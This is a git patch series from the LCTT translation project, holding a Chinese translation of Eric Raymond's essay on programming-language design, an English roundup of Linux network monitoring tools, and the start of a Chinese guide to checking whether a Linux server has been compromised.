他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 + - + -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 + - + -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 + - + -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 + - + -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! + - + -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 + - + -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 + - + -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 + - + -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 + - + -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 + - + -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 + - + -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 + - + -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 + - + -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 + - + -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 + - + --------------------------------------------------------------------------------- + - + -via: http://esr.ibiblio.org/?p=7745 + - + -作者:[Eric Raymond ][a] + -译者:[Valoniakim](https://github.com/Valoniakim) + -校对:[校对者ID](https://github.com/校对者ID) + - + -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + - + -[a]:http://esr.ibiblio.org/?author=2 + -[1]:http://esr.ibiblio.org/?author=2 + -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 + -[3]:http://esr.ibiblio.org/?p=7745 From 277126294de3bab1b6ecd65c4ba45c0f176bc06e Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 20:40:38 +0800 Subject: [PATCH 0294/1627] Rename Language engineering for great justice. to 20171118 Language engineering for great justice. --- ... justice. => 20171118 Language engineering for great justice.} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{Language engineering for great justice. => 20171118 Language engineering for great justice.} (100%) diff --git a/translated/tech/Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice. similarity index 100% rename from translated/tech/Language engineering for great justice. rename to translated/tech/20171118 Language engineering for great justice. From 5712675cd58b52c444ff552300ac34981c59040b Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Tue, 5 Dec 2017 13:01:06 +0800 Subject: [PATCH 0295/1627] Delete Language engineering for great justice --- .../Language engineering for great justice | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 translated/tech/Language engineering for great justice diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice deleted file mode 100644 index d26f9319bd..0000000000 --- a/translated/tech/Language engineering for great justice +++ /dev/null @@ -1,24 +0,0 @@ -最合理的语言工程模式 -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 - - From 0879b0fb09b66f8c82b5dd9e5b1bce26845b8528 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Tue, 5 Dec 2017 13:13:33 +0800 Subject: [PATCH 0296/1627] Translated --- ...ustice. => 20171118 Language engineering for great justice.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171118 Language engineering for great justice. => 20171118 Language engineering for great justice.md} (100%) diff --git a/translated/tech/20171118 Language engineering for great justice. b/translated/tech/20171118 Language engineering for great justice.md similarity index 100% rename from translated/tech/20171118 Language engineering for great justice. rename to translated/tech/20171118 Language engineering for great justice.md From 5d591b422d56be45c975559af2bb952003de6aa5 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 14:53:29 +0800 Subject: [PATCH 0297/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Best=20Network?= =?UTF-8?q?=20Monitoring=20Tools=20For=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Best Network Monitoring Tools For Linux.md | 186 ++++++++++++++++++ 1 file changed, 186 insertions(+) create mode 100644 sources/tech/20171203 Best Network Monitoring Tools For Linux.md diff --git a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md new file mode 100644 index 0000000000..70ee1d651e --- /dev/null +++ b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md @@ -0,0 +1,186 @@ +Best Network Monitoring Tools For Linux +--------- +Keeping control of our network is vital to prevent any program from overusing it and slows down the overall system operation. There are several + +**network monitoring tools** + +for different operating systems today. In this article, we will talk about + +**10 network monitoring tools for Linux** + +that will run from a terminal, ideal for users who do not use GUI or for those who want to keep a control of the network use of a server through from ssh. + +### Iftop + + [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] + +Linux users are generally familiar with Top. This tool is a system monitor that allows us to know in real time all the processes that are running in our system and can manage them easily. Iftop is an application similar to Top but specialized in the monitoring of the network, being able to know a multitude of details regarding the network and all the processes that are making use of it. + +We can obtain more information about this tool and download the necessary packages from the + +[following link][3] + +. + +### Vnstat + + [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] **Vnstat** + +is a network monitor that is included, by default, in most Linux distributions. It allows us to obtain a real-time control of the traffic sent and received in a period of time, chosen by the user. + +​ + +We can obtain more information about this tool and download the necessary packages from the + +[following link.][5] + +### Iptraf + + [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] **IPTraf** + +is a console-based, real-time network monitoring utility for Linux. (IP LAN) - Collects a wide variety of information as an IP traffic monitor that passes through the network, including TCP flags information, ICMP details, TCP / UDP traffic faults, TCP connection packet and Byne account. It also collects statistics information from the general and detailed interface of TCP, UDP,,, checksum errors IP not IP ICMP IP, interface activity, etc. + +​ + +We can obtain more information about this tool and download the necessary packages from the + +[following link.][7] + +### Monitorix - System and Monitoring Network + + [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] + +Monitorix is a lightweight free utility that is designed to run and monitor system and network resources with as many Linux / Unix servers as possible. An HTTP web server has been added that regularly collects system and network information and displays them in the graphs. It will track the average system load and its usage, memory allocation, disk health, system services, network ports, mail statistics (Sendmail, Postfix, Dovecot, etc.), MySQL statistics and many more. It is designed to control the overall performance of the system and helps in detecting faults, bottlenecks, abnormal activities, etc. + +​ + +Download and more + +[information here][9] + +. + +### Dstat + + [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] + +A monitor is somewhat less known than the previous ones but also usually comes by default in many distributions. + +​ + +We can obtain more information about this tool and download the necessary packages from the + +[following link][11] + +. + +### Bwm-ng + + [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] + +One of the simplest tools. It allows you to get data from the connection interactively and, at the same time, export them to a certain format for easier reference on another device. + +​ + +We can obtain more information about this tool and download the necessary packages from the + +[following link][13] + +. + +### Ibmonitor + + [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] + +Similar to the above, it shows network traffic filtered by connection interface and clearly separates the traffic sent from the received traffic. + +​ + +We can obtain more information about this tool and download the necessary packages from the + +[following link​][15] + +. + +### Htop - Linux Process Tracking + + [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] + +Htop is a much more advanced, interactive and real-time Linux tool for tracking processes. It is similar to the top Linux command but has some advanced features such as an easy-to-use interface for process management, shortcut keys, vertical and horizontal view of processes and much more. Htop is a third-party tool and is not included on Linux systems, you must install it using + +**YUM** + +(or + +**APT-GET)** + +or whatever your package management tool. For more information on installation, read + +[this article][17] + +. + +We can obtain more information about this tool and download the necessary packages from the + +[following link.][18] + +### Arpwatch - Ethernet Activity Monitor + + [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] + +Arpwatch is a program that is designed to control the resolution of addresses (MAC and changes in the IP address) of Ethernet network traffic in a Linux network. It is continuously monitoring the Ethernet traffic and records the changes in the IP addresses and MAC addresses, the changes of pairs along with the timestamps in a network. It also has a function to send an e-mail notifying the administrator, when a couple is added or changes. It is very useful in detecting ARP impersonation in a network. + +We can obtain more information about this tool and download the necessary packages from the + +[following link.​][20] + +### Wireshark - Network Monitoring tool + + [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] **[Wireshark][1]** + +is a free application that enables you to catch and view the information going forward and backward on your system, giving the capacity to bore down and read the substance of every parcel – separated to meet your particular needs. It is generally used to investigate arrange issues and additionally to create and test programming. This open-source convention analyzer is generally acknowledged as the business standard, prevailing upon what's coming to it's of honors the years. + +Initially known as Ethereal, Wireshark highlights an easy to understand interface that can show information from many diverse conventions on all real system sorts. + +### Conclusion + +​In this article, we have taken a gander at a few open source network monitoring tools. Because we concentrated on these instruments as the "best" does not really mean they are the best for your need. For instance, there are numerous other open source monitoring apparatuses that exist, for example, OpenNMS, Cacti, and Zennos and you need to consider the advantages of everyone from the point of view of your prerequisite. + +Additionally, there are different apparatuses that might be more good for your need that is not open source. + +​ + +What more network monitors do you use or know to use in Linux in terminal format? + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux + +作者:[​​LinuxAndUbuntu][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:https://www.wireshark.org/ +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png +[3]:http://www.ex-parrot.com/pdw/iftop/ +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png +[5]:http://humdi.net/vnstat/ +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif +[7]:http://iptraf.seul.org/ +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png +[9]:http://www.monitorix.org +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png +[11]:http://dag.wiee.rs/home-made/dstat/ +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png +[13]:http://sourceforge.net/projects/bwmng/ +[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg +[15]:http://ibmonitor.sourceforge.net/ +[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png +[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ +[18]:http://hisham.hm/htop/ +[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png +[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml +[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg From bf4e786ff1a491f1daf98105d7581e9bc05e7276 Mon Sep 17 00:00:00 2001 From: Ezio Date: Tue, 5 Dec 2017 15:06:16 +0800 Subject: [PATCH 0298/1627] =?UTF-8?q?=E6=A0=87=E9=A2=98=E6=9C=89=E9=97=AE?= =?UTF-8?q?=E9=A2=98=EF=BC=8C=E5=B7=B2=E6=94=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171203 Best Network Monitoring Tools For Linux.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md index 70ee1d651e..aec39b9822 100644 --- a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md +++ b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md @@ -1,5 +1,7 @@ Best Network Monitoring Tools For Linux ---------- +=============================== + + Keeping control of our network is vital to prevent any program from overusing it and slows down the overall system operation. There are several **network monitoring tools** From 375651a0ed8fe98bef9094ff057740b046d7acdf Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 14:32:23 +0800 Subject: [PATCH 0299/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=2030=20Best=20Lin?= =?UTF-8?q?ux=20Games=20On=20Steam=20You=20Should=20Play=20in=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Your Linux Server Has Been Compromised.md | 163 +++++++++ ... Games On Steam You Should Play in 2017.md | 310 ++++++++++++++++++ 2 files changed, 473 insertions(+) create mode 100644 sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md create mode 100644 sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md new file mode 100644 index 0000000000..29fe95d868 --- /dev/null +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -0,0 +1,163 @@ +如何判断Linux服务器是否被入侵 +-------------- + +本指南中所谓的服务器被入侵或者说被黑了的意思是指未经认证的人或程序为了自己的目的登录到服务器上去并使用其计算资源, 通常会产生不好的影响。 + +免责声明: 若你的服务器被类似NSA这样的国家机关或者某个犯罪集团如请,那么你并不会发现有任何问题,这些技术也无法发觉他们的存在。 + +然而, 大多数被攻破的服务器都是被类似自动攻击程序这样的程序或者类似“脚本小子”这样的廉价攻击者,以及蠢蛋犯罪所入侵的。 + +这类攻击者会在访问服务器的同时滥用服务器资源,并且不怎么会采取措施来隐藏他们正在做的事情。 + +### 入侵服务器的症状 + +当服务器被没有经验攻击者或者自动攻击程序入侵了的话,他们往往会消耗100%的资源. 他们可能消耗CPU资源来进行数字货币的采矿或者发送垃圾邮件,也可能消耗带宽来发动 `DoS` 攻击。 + +因此出现问题的第一个表现就是服务器 “变慢了”. 这可能表现在网站的页面打开的很慢, 或者电子邮件要花很长时间才能发送出去。 + +那么你应该查看那些东西呢? + +#### 检查 1 - 当前都有谁在登录? + +你首先要查看当前都有谁登录在服务器上. 发现攻击者登录到服务器上进行操作并不罕见。 + +其对应的命令是 `w`. 运行 `w` 会输出如下结果: + +``` + 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 +root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w + +``` + +第一个IP是英国IP,而第二个IP是越南IP. 这个不是个好兆头。 + +停下来做个深呼吸, 不要紧,只需要杀掉他们的SSH连接就好了. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in。 + +请参阅本文最后的 `入侵之后怎么办` 这一章节来看发现被入侵的证据后应该怎么办。 + +`whois` 命令可以接一个IP地址然后告诉你IP注册的组织的所有信息, 当然就包括所在国家的信息。 + +#### 检查 2 - 谁曾经登录过? + +Linux 服务器会记录下哪些用户,从哪个IP,在什么时候登录的以及登陆了多长时间这些信息. 使用 `last` 命令可以查看这些信息。 + +输出类似这样: + +``` +root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in +root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in +root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) +root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) +root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) + +``` + +这里可以看到英国IP和越南IP交替出现, 而且最上面两个IP现在还处于登录状态. 如果你看到任何未经授权的IP,那么请参阅最后章节。 + +登录历史记录会以文本格式记录到 `~/.bash_history`(注:这里作者应该写错了)中,因此很容易被删除。 +通常攻击者会直接把这个文件删掉,以掩盖他们的攻击行为. 因此, 若你运行了 `last` 命令却只看得见你的当前登录,那么这就是个不妙的信号。 + +如果没有登录历史的话,请一定小心,继续留意入侵的其他线索。 + +#### 检查 3 - 回顾命令历史 + +这个层次的攻击者通常不会注意掩盖命令的历史记录,因此运行 `history` 命令会显示出他们曾经做过的所有事情。 +一定留意有没有用 `wget` 或 `curl` 命令来下载类似垃圾邮件机器人或者挖矿程序之类的软件。 + +命令历史存储在 `~/.bash_history` 文件中,因此有些攻击者会删除该文件以掩盖他们的所作所为。 +跟登录历史一样, 若你运行 `history` 命令却没有输出任何东西那就表示历史文件被删掉了. 这也是个不妙的信号,你需要很小心地检查一下服务器了。 + +#### 检查 4 - 哪些进程在消耗CPU? + +你常遇到的这类攻击者通常不怎么会去掩盖他们做的事情. 他们会运行一些特别消耗CPU的进程. 这就很容易发着这些进程了. 只需要运行 `top` 然后看最前的那几个进程就行了。 + +这也能显示出那些未登录的攻击者来. 比如,可能有人在用未受保护的邮件脚本来发送垃圾邮件。 + +如果你最上面的进程对不了解,那么你可以google一下进程名称,或者通过 `losf` 和 `strace` 来看看它做的事情是什么。 + +使用这些工具,第一步从 `top` 中拷贝出进程的 PID,然后运行: + +```shell +strace -p PID + +``` + +这会显示出进程调用的所有系统调用. 它产生的内容会很多,但这些信息能告诉你这个进程在做什么。 + +``` +lsof -p PID + +``` + +这个程序会列出进程打开的文件. 通过查看它访问的文件可以很好的理解它在做的事情。 + +#### 检查 5 - 检查所有的系统进程 + +消耗CPU不严重的未认证进程可能不会在 `top` 中显露出来,不过它依然可以通过 `ps` 列出来. 命令 `ps auxf` 就能显示足够清晰的信息了。 + +你需要检查一下每个不认识的进程. 经常运行 `ps` (这是个好习惯) 能帮助你发现奇怪的进程。 + +#### 检查 6 - 检查进程的网络使用情况 + +`iftop` 的功能类似 `top`,他会显示一系列收发网络数据的进程以及他们的源地址和目的地址。 +类似 `DoS` 攻击或垃圾制造器这样的进程很容易显示在列表的最顶端。 + +#### 检查 7 - 哪些进程在监听网络连接? + 